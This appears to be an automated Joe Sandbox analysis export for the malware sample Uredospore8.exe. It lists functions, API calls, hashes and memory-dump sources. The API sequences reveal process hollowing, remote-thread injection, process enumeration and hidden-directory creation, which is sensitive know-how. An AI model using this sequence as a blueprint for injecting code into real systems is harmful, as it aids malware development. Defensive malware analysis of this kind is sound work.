Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_Uredospore8.jbxd

Similarity

API ID: MemoryVirtualWrite
String ID:
API String ID: 3527976591-0
Opcode ID: a671850407bd8e8fc185180ee1c1a6aa0a778c320929f09fd5b50919388c79fd
Instruction ID: a6c69d0c4065345ed622d8600f7a2d23cb396b7016b60a82b1942f916b41946b
Opcode Fuzzy Hash: a671850407bd8e8fc185180ee1c1a6aa0a778c320929f09fd5b50919388c79fd
Instruction Fuzzy Hash: 02F0AE74244601EFD328DF44C989B64B7E2FB58320F158599E9898B3A2CB31A950DB84

Function 0040CFA0 Relevance: 42.2, APIs: 23, Strings: 1, Instructions: 181
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

#539.MSVBVM60(?,000000F2,0000001E,00000009), ref: 0040D025
__vbaVarMove.MSVBVM60 ref: 0040D037
#664.MSVBVM60(?,?,?,?,?), ref: 0040D083
__vbaVarMove.MSVBVM60 ref: 0040D092
__vbaFreeVarList.MSVBVM60(00000004,?,?,?,?), ref: 0040D0AF
#546.MSVBVM60(?), ref: 0040D0B8
#547.MSVBVM60(?,?), ref: 0040D0C6
__vbaI2Var.MSVBVM60(?), ref: 0040D0D0
__vbaFreeVarList.MSVBVM60(00000002,?,?), ref: 0040D0E0
__vbaVarDup.MSVBVM60 ref: 0040D102
#606.MSVBVM60(000000B3,?), ref: 0040D111
__vbaStrMove.MSVBVM60 ref: 0040D11C
__vbaFreeVar.MSVBVM60 ref: 0040D125
__vbaR8FixI4.MSVBVM60 ref: 0040D131
#678.MSVBVM60(6B480000,4202A32C,?,?,?,?,00000008,?), ref: 0040D17C
EnumChildWindows.USER32(00000000,00401761,00000000), ref: 0040D198
__vbaNew2.MSVBVM60(00409794,0040E3D4), ref: 0040D1B0
__vbaObjSetAddref.MSVBVM60(?,004010D0), ref: 0040D1C9
__vbaHresultCheckObj.MSVBVM60(00000000,02992D14,00409784,00000010), ref: 0040D1E9
__vbaFreeObj.MSVBVM60 ref: 0040D1F2
__vbaFreeStr.MSVBVM60(0040D24C), ref: 0040D235
__vbaFreeVar.MSVBVM60 ref: 0040D244
__vbaFreeVar.MSVBVM60 ref: 0040D249

Strings

CIAO, xrefs: 0040D18C

Memory Dump Source

Source File: 00000000.00000002.2191386625.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2191373309.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2191404274.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2191419016.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Uredospore8.jbxd

Similarity

API ID: __vba$Free$Move$List$#539#546#547#606#664#678AddrefCheckChildEnumHresultNew2Windows
String ID: CIAO
API String ID: 68011276-3635395781
Opcode ID: e26fa3269170dbc251f338622338ba14760696f1e1047a3d096c72d52f577592
Instruction ID: a33c6a46b01e7c3e7cedbf572dd9c782a15f98d0848ce9d799199b7533edd150
Opcode Fuzzy Hash: e26fa3269170dbc251f338622338ba14760696f1e1047a3d096c72d52f577592
Instruction Fuzzy Hash: 087115B1C00219DFDB10CF94DD84ADEBBB8FB48700F10816AE559A72A4DB745A89CFA5

Function 00403B97 Relevance: 3.3, APIs: 1, Strings: 1, Instructions: 252
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,00006000,00001000,00000040,00401001), ref: 00403D5A

Strings

pppp, xrefs: 00403ED0

Memory Dump Source

Source File: 00000000.00000002.2191386625.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2191373309.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2191404274.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2191419016.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Uredospore8.jbxd

Similarity

API ID: AllocVirtual
String ID: pppp
API String ID: 4275171209-1638932250
Opcode ID: f8c26fc1a1590d8ec7b0653796c14533c9a8507a6d7e1b4c277861fab6c1b922
Instruction ID: d7f750331726ee9bd2a85d74b0bd4d950336cd9fd34a28140c0adc5f56aa0888
Opcode Fuzzy Hash: f8c26fc1a1590d8ec7b0653796c14533c9a8507a6d7e1b4c277861fab6c1b922
Instruction Fuzzy Hash: A281060AE37F3A09E1D3B1711A16A22E9456F7708A906CF6FBD20F5992772FD68F1014

Non-executed Functions

Function 004030C1 Relevance: .6, Instructions: 634
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.2191386625.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2191373309.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2191404274.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2191419016.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Uredospore8.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1d65569573e07257ad461f0ca0e0430b6896c08c376a550da6aaae3cb65358a8
Instruction ID: 72500eb02440e067f8e634ee46afb044d1c51410e5f63b9188851a833be2c6e2
Opcode Fuzzy Hash: 1d65569573e07257ad461f0ca0e0430b6896c08c376a550da6aaae3cb65358a8
Instruction Fuzzy Hash: F222C60DE3BF3645E1D3A1311622A62EE005F7708A546DB6FB924B49A2772FE7CF1118

Function 004030CD Relevance: .6, Instructions: 627
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.2191386625.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2191373309.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2191404274.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2191419016.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Uredospore8.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9e88472a803ece5242e52ce481e4c448b9e30868ba3e2a09efb65a7ed66c7764
Instruction ID: 86d6a3a8e447b93f2027ee28c82682b75ed2f1a3e41300e0a631f83723efb331
Opcode Fuzzy Hash: 9e88472a803ece5242e52ce481e4c448b9e30868ba3e2a09efb65a7ed66c7764
Instruction Fuzzy Hash: 0B22B60DE3BF7645E1D3A1311622A62EE005F7708A546DB6FB920B49A2772FE7CF1118

Function 004039A5 Relevance: .4, Instructions: 411
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.2191386625.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2191373309.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2191404274.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2191419016.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Uredospore8.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3df3f4a001aef29bf2a9eee76e5be131c1ff486a7cf645ba8a700012df1085e5
Instruction ID: f363ba01090f7a853829062e15176908a825571c435fd1290d5beec9908c03d4
Opcode Fuzzy Hash: 3df3f4a001aef29bf2a9eee76e5be131c1ff486a7cf645ba8a700012df1085e5
Instruction Fuzzy Hash: 10D1421692A7614EC783CA304940992FF64BFB334570487AFE951BB983E33E964F8349

Function 00700D34 Relevance: .1, Instructions: 52COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2191544160.0000000000700000.00000040.00001000.00020000.00000000.sdmp, Offset: 00700000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_Uredospore8.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 521f89343bccef5a24265a5417f55be21c5412d8132cbe37ccf962384ea1066f
Instruction ID: 68294241099afda18948e7f99c5e71e07d0212d5baf5775832ff062dfcc58f24
Opcode Fuzzy Hash: 521f89343bccef5a24265a5417f55be21c5412d8132cbe37ccf962384ea1066f
Instruction Fuzzy Hash: 2F118E70600941CFDB25CF54C090B6577A1FB8A325F11C26DDA464B3AAD639BC42CB90

Function 007002AE Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2191544160.0000000000700000.00000040.00001000.00020000.00000000.sdmp, Offset: 00700000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_Uredospore8.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ab2d7faec90206d04624137dcf391b9a6c0b9a6dad95826754e4c5e29fff86cb
Instruction ID: bebcbd0f18a999ce64e2d619b59837d29f74db5f3d96bd371bc818b82041d4c7
Opcode Fuzzy Hash: ab2d7faec90206d04624137dcf391b9a6c0b9a6dad95826754e4c5e29fff86cb
Instruction Fuzzy Hash: F9B00179662A80CFCE96CF09C290E40B3B4FB48B50F4258D0E8118BB22C268E900CA10

Analysis Process: Uredospore8.exePID: 364, Parent PID: 3212COMMON

Execution Graph

Execution Coverage:	6.7%
Dynamic/Decrypted Code Coverage:	99%
Signature Coverage:	6.9%
Total number of Nodes:	421
Total number of Limit Nodes:	6

Executed Functions

Function 006D0005 Relevance: 22.1, APIs: 14, Instructions: 1058COMMON

Download Yara Rule

APIs

Part of subcall function 006D09CC: OpenMutexA.KERNEL32(001F0001,00000000), ref: 006D09E6
Part of subcall function 006D09CC: GetStartupInfoA.KERNEL32(00000000), ref: 006D09FE

ExitProcess.KERNEL32(00000000), ref: 006D001D

Memory Dump Source

Source File: 00000002.00000002.2215999535.00000000006D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6d0000_Uredospore8.jbxd

Similarity

API ID: ExitInfoMutexOpenProcessStartup
String ID:
API String ID: 213680645-0
Opcode ID: b109e0e9e5e5c88f701885a31cc478c2ab5e3d8aff70cddd800b113599f869bd
Instruction ID: 11e096ea943061a4108c8d5c31f791fda2210976cb0c9ba137509a3e0147be83
Opcode Fuzzy Hash: b109e0e9e5e5c88f701885a31cc478c2ab5e3d8aff70cddd800b113599f869bd
Instruction Fuzzy Hash: 0872B161C4E3C05FEB179B704A657A67FBAAE53300F1900CBD9C1DB3A3D1149A19C76A

Function 00401000 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 36
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,00A00000,00003000,00000040), ref: 00401064

Strings

alAl, xrefs: 00401036

Memory Dump Source

Source File: 00000002.00000002.2212687252.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Uredospore8.jbxd

Similarity

API ID: AllocVirtual
String ID: alAl
API String ID: 4275171209-1316302345
Opcode ID: a080b2c6f743f0a70159d360efd7c7be18896e261b6016ba325860d891afe58b
Instruction ID: ecc63617fdaeb7cb87c49a60ff0bd2d1c41ed41399276595c5389e0fe46cd30a
Opcode Fuzzy Hash: a080b2c6f743f0a70159d360efd7c7be18896e261b6016ba325860d891afe58b
Instruction Fuzzy Hash: 88014F76A401518FD764CF64C841F11B3E1BF44325F1A81A5D989AB7A2D778FC92CF84

Function 006D09A3 Relevance: 18.1, APIs: 12, Instructions: 120
sleepthreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(00001388), ref: 006D09BE
RtlExitUserThread.NTDLL(00000000), ref: 006D09C6
OpenMutexA.KERNEL32(001F0001,00000000), ref: 006D09E6
GetStartupInfoA.KERNEL32(00000000), ref: 006D09FE

Part of subcall function 006D0A3E: CreateProcessA.KERNELBASE(00000000,006D0A37,00000007,?,?,00000000,00000000,00000000,00000004,00000000,00000000,?,00000000), ref: 006D0A45
Part of subcall function 006D0A3E: Wow64GetThreadContext.KERNEL32(?,00000000), ref: 006D0A6D
Part of subcall function 006D0A3E: VirtualProtectEx.KERNELBASE(?,?,000000EB,00000040,00000000), ref: 006D0A98
Part of subcall function 006D0A3E: DuplicateHandle.KERNELBASE(000000FF,000000FF,?,006D59EC,00000000,00000000,00000002), ref: 006D0ADD
Part of subcall function 006D0A3E: WriteProcessMemory.KERNELBASE(?,?,?,000000EB,00000000), ref: 006D0B0B
Part of subcall function 006D0A3E: ResumeThread.KERNELBASE(?), ref: 006D0B1B
Part of subcall function 006D0A3E: Sleep.KERNELBASE(000003E8), ref: 006D0B2B
Part of subcall function 006D0A3E: OpenMutexA.KERNEL32(001F0001,00000000,00000000), ref: 006D0B42

Memory Dump Source

Source File: 00000002.00000002.2215999535.00000000006D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6d0000_Uredospore8.jbxd

Similarity

API ID: Thread$MutexOpenProcessSleep$ContextCreateDuplicateExitHandleInfoMemoryProtectResumeStartupUserVirtualWow64Write
String ID:
API String ID: 1555264186-0
Opcode ID: 4974744534687c6ca16bfdd406f1a9e76377cc43cabe4b36b7facf944e6376f6
Instruction ID: 8766967e533a52f02cac2bbcfe643286abb01353f95ed1254e16aabba067847b
Opcode Fuzzy Hash: 4974744534687c6ca16bfdd406f1a9e76377cc43cabe4b36b7facf944e6376f6
Instruction Fuzzy Hash: 9541A371A40214AFFF229F60CC85FA973BDEF04744F040196BA49FE1D6DAB09A90CE65

Function 006D0A3E Relevance: 12.1, APIs: 8, Instructions: 76
threadsleepprocessCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(00000000,006D0A37,00000007,?,?,00000000,00000000,00000000,00000004,00000000,00000000,?,00000000), ref: 006D0A45
Wow64GetThreadContext.KERNEL32(?,00000000), ref: 006D0A6D
VirtualProtectEx.KERNELBASE(?,?,000000EB,00000040,00000000), ref: 006D0A98
DuplicateHandle.KERNELBASE(000000FF,000000FF,?,006D59EC,00000000,00000000,00000002), ref: 006D0ADD
WriteProcessMemory.KERNELBASE(?,?,?,000000EB,00000000), ref: 006D0B0B
ResumeThread.KERNELBASE(?), ref: 006D0B1B
Sleep.KERNELBASE(000003E8), ref: 006D0B2B
OpenMutexA.KERNEL32(001F0001,00000000,00000000), ref: 006D0B42

Memory Dump Source

Source File: 00000002.00000002.2215999535.00000000006D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6d0000_Uredospore8.jbxd

Similarity

API ID: ProcessThread$ContextCreateDuplicateHandleMemoryMutexOpenProtectResumeSleepVirtualWow64Write
String ID:
API String ID: 1738979855-0
Opcode ID: beeeac3a1acd6789deb01cd9b1c0b660ec5e97df5daadee7f8ea6533514987fe
Instruction ID: 18c9192235e10ad87d859b00b5427153c1caa84ca467e46d96c0069ac52888aa
Opcode Fuzzy Hash: beeeac3a1acd6789deb01cd9b1c0b660ec5e97df5daadee7f8ea6533514987fe
Instruction Fuzzy Hash: 5F314F31A441149FFF228F10CC89BA977B9EF04744F0805D6AA49FE2E5DBB19A90CE64

Function 006D3511 Relevance: 1.5, APIs: 1, Instructions: 24
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetVolumeInformationA.KERNELBASE(006D350D,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000104), ref: 006D3511

Memory Dump Source

Source File: 00000002.00000002.2215999535.00000000006D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6d0000_Uredospore8.jbxd

Similarity

API ID: InformationVolume
String ID:
API String ID: 2039140958-0
Opcode ID: 75d61119e64eb4024ce7cba51b093e69c9fa78e48c1200fbb9e5cf187241dc42
Instruction ID: fcc54133466bdaf6874b81d1f9fc9d4d351954ef25812920638f207cd98dad9a
Opcode Fuzzy Hash: 75d61119e64eb4024ce7cba51b093e69c9fa78e48c1200fbb9e5cf187241dc42
Instruction Fuzzy Hash: 88F0F8B5900154DBEF02EF64C485A9A7BB8AF44305F4515C9AE4DBF20ACB30A6598F68

Non-executed Functions

Function 006D0E45 Relevance: 6.1, APIs: 4, Instructions: 57
injectionmemorythreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAllocEx.KERNEL32(0000094C,00000000,006D59EC,00003000,00000040,?,?,?,006D0DED,00000000,0000094C,00000000), ref: 006D0E6B
WriteProcessMemory.KERNEL32(0000094C,006D0024,00000000,006D59EC,00000000,?,006D0DED,00000000,0000094C,00000000), ref: 006D0E89
IsWow64Process.KERNEL32(0000094C,?,?,?,006D0DED,00000000,0000094C,00000000), ref: 006D0E9F
CreateRemoteThread.KERNEL32(0000094C,00000000,00000000,00000000,00000000,00000000,00000000), ref: 006D0ED5

Memory Dump Source

Source File: 00000002.00000002.2215999535.00000000006D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6d0000_Uredospore8.jbxd

Similarity

API ID: Process$AllocCreateMemoryRemoteThreadVirtualWow64Write
String ID:
API String ID: 3578747408-0
Opcode ID: 73a63156dcc240dfd57774f03aa3cf0bcc04f9305a5d11e370546c377752cf19
Instruction ID: b6823fd75befb6d50f656db90e8169b41c6d7af9b37e3be228c85aa06840bfb9
Opcode Fuzzy Hash: 73a63156dcc240dfd57774f03aa3cf0bcc04f9305a5d11e370546c377752cf19
Instruction Fuzzy Hash: 68114F32500205FBFF205F15CC45F963B69EF80754F144411FE05BE295E771A561CAA8

Function 006D0849 Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2215999535.00000000006D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6d0000_Uredospore8.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a1623424573e6be2acb58b4229fdfae1f6709ba4e7e5bf64a309903e243988e7
Instruction ID: aea0eddfcb99bbdae678f8b07e1610e594d997339e2e547b3fdfa0bfb0b49c12
Opcode Fuzzy Hash: a1623424573e6be2acb58b4229fdfae1f6709ba4e7e5bf64a309903e243988e7
Instruction Fuzzy Hash: 09C080731041095F9300CE59D841D56F35DEFC1364328C331E105C6146C178E491D7E9

Function 006D06AC Relevance: 19.6, APIs: 13, Instructions: 120
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNEL32(006D06A3,00000009,?,00000000), ref: 006D06B1

Part of subcall function 006D0D01: GetProcAddress.KERNEL32(00000000,006D04D5), ref: 006D0D0E

Part of subcall function 006D06F2: lstrcat.KERNEL32(00000000,006D06E9), ref: 006D0701
Part of subcall function 006D06F2: lstrcmpiA.KERNEL32(?,00000000), ref: 006D071B
Part of subcall function 006D06F2: Sleep.KERNEL32(00001388), ref: 006D072E
Part of subcall function 006D06F2: CreateDirectoryA.KERNEL32(00000000,00000000,00000000), ref: 006D074F
Part of subcall function 006D06F2: SetFileAttributesA.KERNEL32(00000000,00000002), ref: 006D0761
Part of subcall function 006D06F2: CreateDirectoryA.KERNEL32(00000000,00000000,00000000), ref: 006D0782
Part of subcall function 006D06F2: SetFileAttributesA.KERNEL32(00000000,00000002), ref: 006D0794
Part of subcall function 006D06F2: CreateDirectoryA.KERNEL32(00000000,00000000,00000000), ref: 006D07B5
Part of subcall function 006D06F2: SetFileAttributesA.KERNEL32(00000000,00000002), ref: 006D07C7
Part of subcall function 006D06F2: VirtualAlloc.KERNEL32(00000000,00100000,00003000,00000004), ref: 006D07DB
Part of subcall function 006D06F2: VirtualFree.KERNEL32(00000000,00000000,00000000,00000000,00000002,00000000,00000000,00000000,00100000), ref: 006D0822
Part of subcall function 006D06F2: Sleep.KERNEL32(00001388), ref: 006D0841

Memory Dump Source

Source File: 00000002.00000002.2215999535.00000000006D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6d0000_Uredospore8.jbxd

Similarity

API ID: AttributesCreateDirectoryFile$SleepVirtual$AddressAllocFreeLibraryLoadProclstrcatlstrcmpi
String ID:
API String ID: 3164464694-0
Opcode ID: c20eeef422c49ef5dacc71178ffe2c9559f1b83162b6f5b3ac7459e8ac5b62c8
Instruction ID: 0517ad4d0db39fe2677d796e23e6ecfe2f729d6c706fa3b756c5d075ccc935b3
Opcode Fuzzy Hash: c20eeef422c49ef5dacc71178ffe2c9559f1b83162b6f5b3ac7459e8ac5b62c8
Instruction Fuzzy Hash: 6B4104B29042149FEF526B608C89F9A77BDEF44700F45059EBB85EF146EE309580CBA9

Function 006D06F2 Relevance: 18.1, APIs: 12, Instructions: 97
sleepstringmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrcat.KERNEL32(00000000,006D06E9), ref: 006D0701
lstrcmpiA.KERNEL32(?,00000000), ref: 006D071B
Sleep.KERNEL32(00001388), ref: 006D072E
CreateDirectoryA.KERNEL32(00000000,00000000,00000000), ref: 006D074F
SetFileAttributesA.KERNEL32(00000000,00000002), ref: 006D0761
CreateDirectoryA.KERNEL32(00000000,00000000,00000000), ref: 006D0782
SetFileAttributesA.KERNEL32(00000000,00000002), ref: 006D0794
CreateDirectoryA.KERNEL32(00000000,00000000,00000000), ref: 006D07B5
SetFileAttributesA.KERNEL32(00000000,00000002), ref: 006D07C7
VirtualAlloc.KERNEL32(00000000,00100000,00003000,00000004), ref: 006D07DB
VirtualFree.KERNEL32(00000000,00000000,00000000,00000000,00000002,00000000,00000000,00000000,00100000), ref: 006D0822
Sleep.KERNEL32(00001388), ref: 006D0841

Memory Dump Source

Source File: 00000002.00000002.2215999535.00000000006D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6d0000_Uredospore8.jbxd

Similarity

API ID: AttributesCreateDirectoryFile$SleepVirtual$AllocFreelstrcatlstrcmpi
String ID:
API String ID: 2622802024-0
Opcode ID: 2d5341e2d3486ad8ae313cfc35730e242c1b71eebb05ac8df6fd9b5554d17158
Instruction ID: 0f23531775a1e81fc46949e6a7fb5a7c341413a6ea5a8836b0e50f9c511a4061
Opcode Fuzzy Hash: 2d5341e2d3486ad8ae313cfc35730e242c1b71eebb05ac8df6fd9b5554d17158
Instruction Fuzzy Hash: EA3103B29042149FEF566B608C89F9A73BDEF44700F45049EBB85EF145DE309680CEA9

Function 006D268A Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 73
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ExpandEnvironmentStringsA.KERNEL32(006D267A,00000010,?,?,00000000,00000104), ref: 006D268F
lstrcat.KERNEL32(00000000,006D26C7), ref: 006D26D4
lstrcat.KERNEL32(00000000,00000000), ref: 006D26E7

Strings

\AC\, xrefs: 006D26A7

Memory Dump Source

Source File: 00000002.00000002.2215999535.00000000006D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6d0000_Uredospore8.jbxd

Similarity

API ID: lstrcat$EnvironmentExpandStrings
String ID: \AC\
API String ID: 2903145849-1749977576
Opcode ID: 9add6d2c685be6ba9b11d7ae33e1f8ee7394e656f3ace74048cbccfc4307d2af
Instruction ID: 4b7f375645103273f80660f79e6e5b209e73925a33936798e93832d171b36759
Opcode Fuzzy Hash: 9add6d2c685be6ba9b11d7ae33e1f8ee7394e656f3ace74048cbccfc4307d2af
Instruction Fuzzy Hash: 5021927190024AEFEF119F60CC59B9DBBB5FF20704F14409AED54EE2A1D7308A65DB64

Function 006D0D4D Relevance: 12.1, APIs: 8, Instructions: 64
sleepprocessCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 006D0D6C
Sleep.KERNEL32(000003E8), ref: 006D0D82
Process32First.KERNEL32(?,00000000), ref: 006D0DA2
OpenProcess.KERNEL32(001F0FFF,00000000,?), ref: 006D0DD7
CloseHandle.KERNEL32(00000000,0000094C,00000000), ref: 006D0DED
Process32Next.KERNEL32(?,?), ref: 006D0E03
CloseHandle.KERNEL32(?), ref: 006D0E2F
Sleep.KERNEL32(000003E8), ref: 006D0E3A

Memory Dump Source

Source File: 00000002.00000002.2215999535.00000000006D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6d0000_Uredospore8.jbxd

Similarity

API ID: CloseHandleProcess32Sleep$CreateFirstNextOpenProcessSnapshotToolhelp32
String ID:
API String ID: 2496627043-0
Opcode ID: 1d14222e008f5e06e437f4b2d3671cdf3121152bf9a7f5596c02336e82120a0a
Instruction ID: 262c90d834cb772e4f757be0fbe6136132d40962fff6acdfbbca4cd3786595ff
Opcode Fuzzy Hash: 1d14222e008f5e06e437f4b2d3671cdf3121152bf9a7f5596c02336e82120a0a
Instruction Fuzzy Hash: 2E219035901118ABFF225F54CC54BE9B7BAFF08700F1801DAE909EA291CA309E508F54

Function 006D2AAC Relevance: 7.6, APIs: 5, Instructions: 108
filesleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(00000064), ref: 006D2A84

Part of subcall function 006D2BDF: Sleep.KERNEL32(00002710), ref: 006D2C50

DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,00000004,00000000,00000000,00A00000), ref: 006D2B26
DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,00000004,00000000,00000000,00A00000), ref: 006D2B6A
DeleteFileA.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000001,00000000,00000000,00A00000), ref: 006D2BC0
Sleep.KERNEL32(03E80032,00000000,00000000,00000000,00000000,00000000,00A00000,00000000,00000000,00A00000,00000000,00000000,00A00000,00000000,00000000), ref: 006D2BD4

Memory Dump Source

Source File: 00000002.00000002.2215999535.00000000006D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6d0000_Uredospore8.jbxd

Similarity

API ID: DeleteFileSleep
String ID:
API String ID: 3161721237-0
Opcode ID: ccc77a8dcdda45c6555d732deb7b8c046add19b0ac98e93311101b284191132d
Instruction ID: 59b6c4f25c0c8f198e7affaaab457013fdecb80149cef5c66d2237d141675706
Opcode Fuzzy Hash: ccc77a8dcdda45c6555d732deb7b8c046add19b0ac98e93311101b284191132d
Instruction Fuzzy Hash: B6317771D003565EDF626F708C59FAB77BDEFA0708F00089BB945D6241DA70D680CEA5

Function 006D32E6 Relevance: 7.6, APIs: 5, Instructions: 66
processstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrcat.KERNEL32(00000000,00000000), ref: 006D330A
GetStartupInfoA.KERNEL32(00000000), ref: 006D3354
CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,006D32D5,00000011,?,00000000,00A00000), ref: 006D3381
CloseHandle.KERNEL32(?,?,006D32D5,00000011,?,00000000,00A00000,00A00000,006D318E,00000004,00000000), ref: 006D338D
CloseHandle.KERNEL32(?,?,006D32D5,00000011,?,00000000,00A00000,00A00000,006D318E,00000004,00000000), ref: 006D3399

Memory Dump Source

Source File: 00000002.00000002.2215999535.00000000006D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6d0000_Uredospore8.jbxd

Similarity

API ID: CloseHandle$CreateInfoProcessStartuplstrcat
String ID:
API String ID: 3387338972-0
Opcode ID: 8a98a979b3afe01a6b6469a2d28bd76d619105e30e33d273b309531e6d902268
Instruction ID: daaf3fb9eb2b67e7c11b9d1df21a090bc1a090085a3a9aff1bc5c4a765f1f9d5
Opcode Fuzzy Hash: 8a98a979b3afe01a6b6469a2d28bd76d619105e30e33d273b309531e6d902268
Instruction Fuzzy Hash: 0211A5B2C005649FEF526B20CD85FEFB7FDEF50305F0144AAE985E6205DA349A80CE96

Function 006D32B3 Relevance: 7.6, APIs: 5, Instructions: 61
processstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrcat.KERNEL32(00000000,00000000), ref: 006D330A
GetStartupInfoA.KERNEL32(00000000), ref: 006D3354
CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,006D32D5,00000011,?,00000000,00A00000), ref: 006D3381
CloseHandle.KERNEL32(?,?,006D32D5,00000011,?,00000000,00A00000,00A00000,006D318E,00000004,00000000), ref: 006D338D
